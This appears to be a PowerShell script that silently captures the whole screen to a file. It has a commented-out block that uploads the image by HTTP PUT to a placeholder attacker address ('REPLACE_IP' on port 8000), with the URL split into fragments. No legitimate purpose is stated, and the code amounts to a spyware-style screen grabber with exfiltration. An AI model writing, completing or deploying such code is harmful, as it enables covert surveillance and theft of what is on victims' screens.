[Reflection.Assembly]::LoadWithPartialName("System.Drawing")
function screenshot([Drawing.Rectangle]$bounds, $path) {
   $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height
   $graphics = [Drawing.Graphics]::FromImage($bmp)

   $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)

   $bmp.Save($path)

   $graphics.Dispose()
   $bmp.Dispose()
}

$bounds = [Drawing.Rectangle]::FromLTRB(0, 0, 1920, 1080)
screenshot $bounds "C:\screenshot.png"

####################### Until here the file is working and make the Screenshot##################



# $ip   = "REPLACE_IP"
# $port = 8000
# $uploadFunctionPath = ("http" + ':' + "//$ip" + ':' + "$port/upload/")
# $picPath = "C:\screenshot.png"
# Invoke-WebRequest -uri $uploadFunctionPath -Method Put -Infile $picPath -ContentType 'image/png' 
